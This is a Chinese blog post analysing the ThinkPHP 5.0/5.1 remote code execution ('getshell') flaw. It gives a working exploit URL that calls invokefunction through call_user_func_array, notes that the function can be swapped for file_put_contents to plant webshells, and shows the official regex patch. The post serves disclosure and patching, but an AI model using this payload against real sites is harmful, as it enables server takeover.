thinkphp5.0和5.1的getshell漏洞示例分析

发布时间:2021-03-10 09:48:35 作者:小新
来源:亿速云 阅读:269

这篇文章将为大家详细讲解有关thinkphp5.0和5.1的getshell漏洞示例分析,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。

之前网站被提权了,那时候网站才建没几天,应该不会有人故意为之,可能是批量扫描getshell的,为了方便我找的是开源系统thinkcmf建了博客,看着挺不错的,因为thinkcmf用的是thinkphp5.0的框架开发的,我到thinkphp.cn上去看了一下,原来有一个提权漏洞。

libaray/think/app.php文件中模块,控制器,方法使用的是/来区分开来。

然后并没有对控制器进行过滤,导致可以构造执行各种函数

thinkphp5.0和5.1的getshell漏洞示例分析

thinkphp5.0和5.1的getshell漏洞示例分析

thinkphp5.0和5.1的getshell漏洞示例分析

thinkphp5.0和5.1的getshell漏洞示例分析

我在本地建一个虚拟主机测试http://cmf.com

构造一个url访问,可以直接打印出phpinfo:

http://cmf.com/index.php?s=portal/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp5.0和5.1的getshell漏洞示例分析

然后你可以把phpinfo换成其他函数,比如使用file_put_content函数创建各种大马小马文件。

TP官方的修复5.0方法是:

think\App类的module方法的获取控制器的代码后面加上

if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}

我用的thinkcmf的版本是:ThinkCMF 5.0.180901

然后我看了一下thinkcmf的官网已经更新到5.0.190111,最新版也更新了tp5.0到最新版本5.0.24了包含了安全更新,当然也没有这个提权漏洞了。

关于“thinkphp5.0和5.1的getshell漏洞示例分析”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。

推荐阅读:
  1. discuz 最新后台getshell的示例分析
  2. thinkPHP5.0框架整体架构的示例分析

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

thinkphp getshell

上一篇:php如何实现汉字转unicode编码

下一篇:thinkphp5如何清除缓存、模版缓存和日志缓存

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》